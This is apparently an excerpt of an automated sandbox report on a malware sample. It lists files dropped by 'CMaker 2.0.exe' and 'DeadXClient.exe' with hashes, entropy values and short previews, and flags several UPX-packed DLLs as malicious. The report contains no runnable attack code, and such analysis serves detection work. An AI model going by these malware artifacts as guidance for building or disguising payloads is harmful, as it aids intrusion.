SHA1:E442040C26CD76D1B946822CAF29011A51F75D6D
SHA-256:3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
SHA-512:77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
Malicious:false
Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of *both* these licenses..
Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
File Type:ASCII text
Category:dropped
Size (bytes):11360
Entropy (8bit):4.426756947907149
Encrypted:false
SSDEEP:192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
MD5:4E168CCE331E5C827D4C2B68A6200E1B
SHA1:DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
SHA-256:AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
SHA-512:F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
Malicious:false
                                                                                                                                                                                Preview:. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1532
                                                                                                                                                                                Entropy (8bit):5.058591167088024
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
                                                                                                                                                                                MD5:5AE30BA4123BC4F2FA49AA0B0DCE887B
                                                                                                                                                                                SHA1:EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
                                                                                                                                                                                SHA-256:602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
                                                                                                                                                                                SHA-512:DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):5430
                                                                                                                                                                                Entropy (8bit):5.111666659056883
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:Dx2pqZink/QIHQIyzQIZQILuQIR8vtklGovuxNx6rIWwCvCCcT+vIrrr9B+M6VwP:4JnkoBs/stL18cT+vIrrxsM6VwDjyeyM
                                                                                                                                                                                MD5:07E3EEA441A0E6F99247D353BD664EA1
                                                                                                                                                                                SHA1:99C8F9C2DD2D02BE18D50551ED4488325906C769
                                                                                                                                                                                SHA-256:04FE672BF2AA70FF8E6B959DEFE7D676DCDFD34EE9062030BA352A40DB5E2D37
                                                                                                                                                                                SHA-512:24F458C831F7A459D12E0217F4BD57F82A034FEC9EA154CAC303200E241A52838A1962612C5AAFF5CD837F668FDC810606624DCA901F4274973F84A9ADBA8D66
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:Metadata-Version: 2.1..Name: cryptography..Version: 42.0.8..Summary: cryptography is a package which provides cryptographic recipes and primitives to Python developers...Author-email: The Python Cryptographic Authority and individual contributors <cryptography-dev@python.org>..License: Apache-2.0 OR BSD-3-Clause..Project-URL: homepage, https://github.com/pyca/cryptography..Project-URL: documentation, https://cryptography.io/..Project-URL: source, https://github.com/pyca/cryptography/..Project-URL: issues, https://github.com/pyca/cryptography/issues..Project-URL: changelog, https://cryptography.io/en/latest/changelog/..Classifier: Development Status :: 5 - Production/Stable..Classifier: Intended Audience :: Developers..Classifier: License :: OSI Approved :: Apache Software License..Classifier: License :: OSI Approved :: BSD License..Classifier: Natural Language :: English..Classifier: Operating System :: MacOS :: MacOS X..Classifier: Operating System :: POSIX..Classifier: Operating Syst
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15325
                                                                                                                                                                                Entropy (8bit):5.563458272393817
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:eUXz6cZmsyP6gbCP+onvZ6FGotqw++9wvnd:eUj6cZmsyP6g4N
                                                                                                                                                                                MD5:D642B5D5BB864006D0457F1CB8E41197
                                                                                                                                                                                SHA1:81F98E289CF8320701353BFBBA8255C6460EDD3B
                                                                                                                                                                                SHA-256:3909DBBE41F046B701CC362332C28020C25A20963E3B8587D1C453402C106859
                                                                                                                                                                                SHA-512:0397C2C71045E0F9FCE25FD5A350A3F4FA3A230937ECD659D9955D1FD75D1D5A21370A88D9A7F9F44111E4D3DF7578C2EF7A16B43B542AEDF7B65DBD484886DD
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:cryptography-42.0.8.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-42.0.8.dist-info/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197..cryptography-42.0.8.dist-info/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-42.0.8.dist-info/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography-42.0.8.dist-info/METADATA,sha256=BP5nK_KqcP-Oa5Wd7-fWdtzf007pBiAwujUqQNteLTc,5430..cryptography-42.0.8.dist-info/RECORD,,..cryptography-42.0.8.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..cryptography-42.0.8.dist-info/WHEEL,sha256=ZzJfItdlTwUbeh2SvWRPbrqgDfW_djikghnwfRmqFIQ,100..cryptography-42.0.8.dist-info/top_level.txt,sha256=KNaT-Sn2K4uxNaEbe6mYdDn3qWDMlp4y-MtWfB73nJc,13..cryptography/__about__.py,sha256=ugkzP6GZzVCOhwUvdLskgcf4kS7b7o-gvba32agVp94,445..cryptography/__init__.py,sha256=iVPlBlXWTJyiFeRedxcbMPhyHB34viOM10d72vGnWuE,364..cryptography/__pycache__/_
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):100
                                                                                                                                                                                Entropy (8bit):5.0203365408149025
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:RtEeX7MWcSlVlbY3KgP+tkKciH/KQLn:RtBMwlVCxWKTQLn
                                                                                                                                                                                MD5:C48772FF6F9F408D7160FE9537E150E0
                                                                                                                                                                                SHA1:79D4978B413F7051C3721164812885381DE2FDF5
                                                                                                                                                                                SHA-256:67325F22D7654F051B7A1D92BD644F6EBAA00DF5BF7638A48219F07D19AA1484
                                                                                                                                                                                SHA-512:A817107D9F70177EA9CA6A370A2A0CB795346C9025388808402797F33144C1BAF7E3DE6406FF9E3D8A3486BDFAA630B90B63935925A36302AB19E4C78179674F
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.42.0).Root-Is-Purelib: false.Tag: cp39-abi3-win_amd64..
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):13
                                                                                                                                                                                Entropy (8bit):3.2389012566026314
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:cOv:Nv
                                                                                                                                                                                MD5:E7274BD06FF93210298E7117D11EA631
                                                                                                                                                                                SHA1:7132C9EC1FD99924D658CC672F3AFE98AFEFAB8A
                                                                                                                                                                                SHA-256:28D693F929F62B8BB135A11B7BA9987439F7A960CC969E32F8CB567C1EF79C97
                                                                                                                                                                                SHA-512:AA6021C4E60A6382630BEBC1E16944F9B312359D645FC61219E9A3F19D876FD600E07DCA6932DCD7A1E15BFDEAC7DBDCEB9FFFCD5CA0E5377B82268ED19DE225
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:cryptography.
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2102272
                                                                                                                                                                                Entropy (8bit):7.999630264030653
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:49152:Zxb/ugbzxYwKmcNaEufwWGvEJx4nC1M+MvyaR:ZZ5LsNNWdQn8ZZ0
                                                                                                                                                                                MD5:B77C7DE3D1F9BF06ECAD3A1F8417F435
                                                                                                                                                                                SHA1:AB60A744F8614EA68FD522CE6AEB125F9FC2F2D8
                                                                                                                                                                                SHA-256:A59A933DEF9329CCBCAC18135EC2976599A42EBD8FFDAEED650DC185B47B11FB
                                                                                                                                                                                SHA-512:1AFAF8C42D41D03E47A671325215452FCB8B4EA6576ACAC056AE18297829FB1F67C24F367AD20D825B0C5CB6D7997529D796BD947FF03B89154E7C5686335879
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..m...m...m...d.@.....2..o...2..|...2..e...2..i....2..o...m...L......|...1......m.......1..l...1..l...Richm...........................PE..d....o_f.........." ...'.. ...... O..)o..0O..................................Po...........`.........................................(Eo.p....@o.(............`j.DO...........Eo.$............................5o.(....6o.@...........................................UPX0..... O.............................UPX1...... ..0O... .................@...UPX2.........@o....... .............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1629464
                                                                                                                                                                                Entropy (8bit):7.952620301087112
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:49152:kMyDwbv70aKbP1zkLO5YHLA1CPwDvt3uFlDCZ:owbv77KbPaqYHLA1CPwDvt3uFlDCZ
                                                                                                                                                                                MD5:F3FDBBD6C6EA0ABE779151AE92C25321
                                                                                                                                                                                SHA1:0E62E32666BA5F041B5369B36470295A1916CB4E
                                                                                                                                                                                SHA-256:9000E335744818665B87A16A71DA5B622B5052B5341F1D6CE08FF8346D2BF3E4
                                                                                                                                                                                SHA-512:E8A363042A05868ACC693B5D313F52FFC95B8F6B764A77FF477B0CE2288787DD275478DDBE33D6DBD87636BA9FF0243D2E447A161E2F9CC2F3DBA0746F219E4E
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./',.kFB.kFB.kFB.b>..yFB..:C.iFB..:G.gFB..:F.cFB..:A.oFB.kFC..FB. >C.`FB.;A.KFB.;F..EB.;B.jFB.;..jFB.;@.jFB.RichkFB.........................PE..d...x..e.........." ...#. .......`9.0{O..p9.................................. R...........`......................................... .O......O.h.....O.......K.\.............R.......................................O.@...........................................UPX0.....`9.............................UPX1..... ...p9.....................@....rsrc.........O.....................@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):29968
                                                                                                                                                                                Entropy (8bit):7.677818197322094
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:Tp/6aepjG56w24Up3p45YiSyvkIPxWEqG:5A154spK7SytPxF
                                                                                                                                                                                MD5:0D1C6B92D091CEF3142E32AC4E0CC12E
                                                                                                                                                                                SHA1:440DAD5AF38035CB0984A973E1F266DEFF2BD7FC
                                                                                                                                                                                SHA-256:11EE9C7FB70C3756C0392843245935517171B95CC5BA0D696B2C1742C8D46FB6
                                                                                                                                                                                SHA-512:5D514ECAB93941E83C008F0E9749F99E330949580884BF4850B11CAC08FE1AC4AC50033E8888045FE4A9D8B4D2E3EA667B39BE18F77266D00F8D7D6797260233
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):229144
                                                                                                                                                                                Entropy (8bit):7.930038440560372
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3072:GFfmvsqWLSCMT+MyN6Qp2oZqpN+/fvrqknqbf6CjaBGkfPkZAK1ck2kBVfLwOmFd:GFevsT9JN+vyH1nqLr3CPrYBBRcd
                                                                                                                                                                                MD5:F9BC28708C1628EF647A17D77C4F5F1A
                                                                                                                                                                                SHA1:032A8576487AD26F04D31628F833EF9534942DA6
                                                                                                                                                                                SHA-256:49BA508DC66C46B9E904BB5FE50CF924465EFF803A9F1E4260E752B0231EFCC1
                                                                                                                                                                                SHA-512:E33FD00BCF73AAB8BCE260EDA995A1513930B832EA881C5A8CE1A151BE3576F3369AC0B794FDD93806157BB9F4FE4EBA38A25F4FDC512A6F3640647B8B447387
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):67352
                                                                                                                                                                                Entropy (8bit):6.1462717896521335
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:lGw/EsYpkVgBaz57kcDA7QKFmpz7cnzH/ks/KF61xubwmB1Cf//yhC74JFmpktJa:r/5k8cnzeJd9IVL0v7SyJwx/
                                                                                                                                                                                MD5:D8BA00C1D9FCC7C0ABBFFB5C214DA647
                                                                                                                                                                                SHA1:5FA9D5700B42A83BFCC125D1C45E0111B9D62035
                                                                                                                                                                                SHA-256:E45452EFA356DB874F2E5FF08C9CC0FE22528609E5D341F8FB67BA48885AB77D
                                                                                                                                                                                SHA-512:DF1B714494856F618A742791EEFBF470B2EEE07B51D983256E4386EA7D48DA5C7B1E896F222EA55A748C9413203886CDE3A65EF9E7EA069014FA626F81D79CD3
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1705240
                                                                                                                                                                                Entropy (8bit):7.993600008484676
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:24576:CJY99sOZi/8N8C1CSIJyR4ZRE1Rqq/uQivcHe2Bg5Cmek5CP7uP6zohpLGLZFkh2:9jZiEN8p6ivZUHe2BgcpP7uaor6
                                                                                                                                                                                MD5:AFFA456007F359E9F8C5D2931D966CB9
                                                                                                                                                                                SHA1:9B06D6CB7D7F1A7C2FA9E7F62D339B9F2813E80F
                                                                                                                                                                                SHA-256:4BAB2E402A02C8B2B0542246D9EF54027A739121B4B0760F08CD2E7C643ED866
                                                                                                                                                                                SHA-512:7C357F43DD272E1D595CCDE87C13FD2CDF4123B20AF6855576BFBA15AFD814A95886CEBBE96BB7781B916F9DB3C3EE02D381036DDBF62095DE3EE43A7F94D156
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):26392
                                                                                                                                                                                Entropy (8bit):7.44233047444268
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:kUAW1guHrh0h1d4NZa7gJXZjNIVQG86lHQIYiSy1pCQfwug+AM+o/8E9VF0NyciC:kjW1JVpJjNIVQG8S5YiSyv3g+AMxkEdC
                                                                                                                                                                                MD5:A74E10B7401EA044A8983D01012F3103
                                                                                                                                                                                SHA1:CDD0AFA6AE1DCEBC9CCFEC17E23C6770A9ABFB8F
                                                                                                                                                                                SHA-256:78A4B12D7DA7E67B1DC90646B269C3E8DFEA5DC24E5EEF4787FFFD4325FE39D8
                                                                                                                                                                                SHA-512:A080050B5D966303D2A27CAFCA8CBF83777329A54CA00BBB16EB547EEF4262C9FDF7C828CADB02E952AEB631EC560D1DCE3CF91F387A96DE9E82037F1C3AC47B
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):302872
                                                                                                                                                                                Entropy (8bit):7.986782854548308
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6144:yk/Qvs7yfQJYx4x9UVqHDMDNCStEQc5YmDp9KiQ/y:ykUfQJbUV2MhCwEQc5Np9zQ6
                                                                                                                                                                                MD5:660EF38D6DE71EB7E06C555B38C675B5
                                                                                                                                                                                SHA1:944EC04D9B67D3F25D3FB448973C7AD180222BE3
                                                                                                                                                                                SHA-256:FD746987AB1EA02B6568091040E8C5204FB599288977F8077A7B9ECEFDC5EDB4
                                                                                                                                                                                SHA-512:26AC7D56E4FB02E43E049C9055979FC6E0E16FAB8F08F619233E12B278F300FAA5FFABAC1D9B71091571A89CDF9ACFEB3478508FBA96EF2E647327215BE6E9D7
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                Process:C:\Users\Public\DeadXClient.exe
                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Oct 22 16:37:13 2024, mtime=Tue Oct 22 16:37:13 2024, atime=Tue Oct 22 16:37:13 2024, length=35840, window=hide
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1003
                                                                                                                                                                                Entropy (8bit):4.620356106842223
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:8p+WWLFUM6ICzuCHqXDvhnX2FACmUqLljlUMvCjASG9KbgkNvqWzYVDSVlk44t2h:8prOvL2AXqnvdYgnqygm
                                                                                                                                                                                MD5:0D427E1DF618EE79795A080617AEC84A
                                                                                                                                                                                SHA1:B47580920C7B9A3A3617D3559D719EEF3F4844BC
                                                                                                                                                                                SHA-256:AAE2D5F12372094ED50062558FFB1C5E1CE9692B9058F71718A2E0271C8468DF
                                                                                                                                                                                SHA-512:7BC6C09FF36FFFB46EBA21122F8F924D837E76DF9C9639913CB6E44F7B49486785B104688D028E989657799A3BE5B0A6C9AB8C89859CE2BFDB26DC4E175E8E8A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3444
                                                                                                                                                                                Entropy (8bit):5.011954215267298
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                                                                                                                                                                MD5:B133A676D139032A27DE3D9619E70091
                                                                                                                                                                                SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                                                                                                                                                                SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                                                                                                                                                                SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):64
                                                                                                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):129304
                                                                                                                                                                                Entropy (8bit):3.4053644175972018
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:X1i4nfw8ld9+mRDaUR28oV7TYfXLi7NwrgSwNu56FRto:XBnfw8ld9+mRDaUR28oV7TY+7S0bS
                                                                                                                                                                                MD5:9AF42BB696EFC1BBDD22EE27988B26DE
                                                                                                                                                                                SHA1:EC894667C90179CB8EE7EA08B39974EB30984877
                                                                                                                                                                                SHA-256:06F0E20AA133D253C6F1551A7DEE48A9BDE83FE54DBA2EEF81EC7A20B5D7862F
                                                                                                                                                                                SHA-512:39A07E7F021015D49C57672B92A39ABBEA59F33E025792FE83F73E5AF6DC31F1DB0F85D58CDC2C10E8ED50026B6A743207E4587EBED75A0B7C7625EABEB333DC
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1...1.8.4.7...2...S.y.s.t.e.m...4...M.e.m.o.r.y...6...%. .P.r.o.c.e.s.s.o.r. .T.i.m.e...1.0...F.i.l.e. .R.e.a.d. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.2...F.i.l.e. .W.r.i.t.e. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.4...F.i.l.e. .C.o.n.t.r.o.l. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.6...F.i.l.e. .R.e.a.d. .B.y.t.e.s./.s.e.c...1.8...F.i.l.e. .W.r.i.t.e. .B.y.t.e.s./.s.e.c...2.0...F.i.l.e. .C.o.n.t.r.o.l. .B.y.t.e.s./.s.e.c...2.4...A.v.a.i.l.a.b.l.e. .B.y.t.e.s...2.6...C.o.m.m.i.t.t.e.d. .B.y.t.e.s...2.8...P.a.g.e. .F.a.u.l.t.s./.s.e.c...3.0...C.o.m.m.i.t. .L.i.m.i.t...3.2...W.r.i.t.e. .C.o.p.i.e.s./.s.e.c...3.4...T.r.a.n.s.i.t.i.o.n. .F.a.u.l.t.s./.s.e.c...3.6...C.a.c.h.e. .F.a.u.l.t.s./.s.e.c...3.8...D.e.m.a.n.d. .Z.e.r.o. .F.a.u.l.t.s./.s.e.c...4.0...P.a.g.e.s./.s.e.c...4.2...P.a.g.e. .R.e.a.d.s./.s.e.c...4.4...P.r.o.c.e.s.s.o.r. .Q.u.e.u.e. .L.e.n.g.t.h...4.6...T.h.r.e.a.d. .S.t.a.t.e...4.8...P.a.g.e.s. .O.u.t.p.u.t./.s.e.c...5.0...P.a.g.e. .W.r.i.t.e.s./.s.e.c...5.2...B.r.o.w.s.e.r...5.4...A.n.n.o.u.
                                                                                                                                                                                Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:modified
                                                                                                                                                                                Size (bytes):697270
                                                                                                                                                                                Entropy (8bit):3.2735341717803963
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3072:NUdGNuowE4j0PrRZnpETMDZ8M6d0PHHx643/A5BK9YXdhPHlVziwC4ALWI1dnmRj:78M6d0w+WB62
                                                                                                                                                                                MD5:DD78C325FDB07A0714C016FD6FE034CA
                                                                                                                                                                                SHA1:A7758E36212A446040010A0A5A34DBCF2B822394
                                                                                                                                                                                SHA-256:E146AD67B5E4CB731007F1AB70191C5AE0BA835E25E10F1D4BB61C7AA8459B42
                                                                                                                                                                                SHA-512:EDDC0D47A747CB95EFF9B1721D12C53077A4C6F7E1395647AF6B8F83926B627EA67B477F4B0FD5ADFE364D8E852C0FAA55665E104D9B6E91391A9F0DC5D7622C
                                                                                                                                                                                Malicious:false
